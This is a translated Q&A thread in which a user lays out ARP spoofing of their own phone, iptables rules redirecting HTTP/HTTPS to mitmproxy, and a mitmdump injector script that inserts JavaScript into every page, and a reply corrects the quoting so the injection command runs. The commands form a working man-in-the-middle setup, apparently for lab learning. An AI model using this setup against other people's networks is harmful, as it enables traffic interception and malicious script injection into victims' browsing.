Я пытаюсь установить перехват трафика с моего телефона с помощью ARPspoof и ввести заголовок javascript на страницу.

Прежде чем начать, я ввел следующие команды:

echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth1 -j ACCEPT
sudo iptables -A FORWARD -i eth1 -o wlan0 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

Для перехвата трафика я ввел следующие команды:

sudo arpspoof -i wlan0 -t <phone_ip_here> <router_ip_here>
sudo arpspoof -i wlan0 -t <router_ip_here> <phone_ip_here>

И я запустил веб-сервер для развертывания файла javascript, который будет встроен в каждую веб-страницу, которую получает телефон.

Этот веб-сервер будет размещен на IP-адресе компьютера Kali на порту 8000.

sudo python3 httpServer.py

И, наконец, когда я запускаю mitmdump, я получаю эту ошибку:

mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'

Сообщение об ошибке:

/usr/bin/mitmdump: No such script

Я не уверен, что я делаю неправильно, если я выполняю mitmproxy с помощью команды:

mitmproxy -p 8080

Трафик направляется на mitmproxy ОДНАКО, я получаю ошибку 400 Bad Request Error в браузере моего телефона, и mitmproxy возвращает ошибку протокола http.

Любая помощь или предложения будут тепло приветствоваться.

0
SidS 27 Май 2018 в 12:27

1 ответ

mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'

Обратите особое внимание на одинарные кавычки. Параметр -s для mitmdump указывает имя запускаемого сценария. Здесь вы фактически сообщаете компьютеру, что имя сценария

injector.py<space>http://<kali_computer_ip>:8000/script.js

Поскольку в имени файла injector.py нет специальных символов, его не нужно заключать в кавычки. С другой стороны, URL-адрес может нуждаться в кавычках, если он содержит вопросительный знак или другие символы, имеющие особое значение для оболочки. Итак, если предположить, что injector.py находится в текущем каталоге, где вы выполняете эту команду, я думаю, что это может сделать то, что вы хотите:

mitmdump -s injector.py 'http://<kali_computer_ip>:8000/script.js'
0
telcoM 27 Май 2018 в 14:13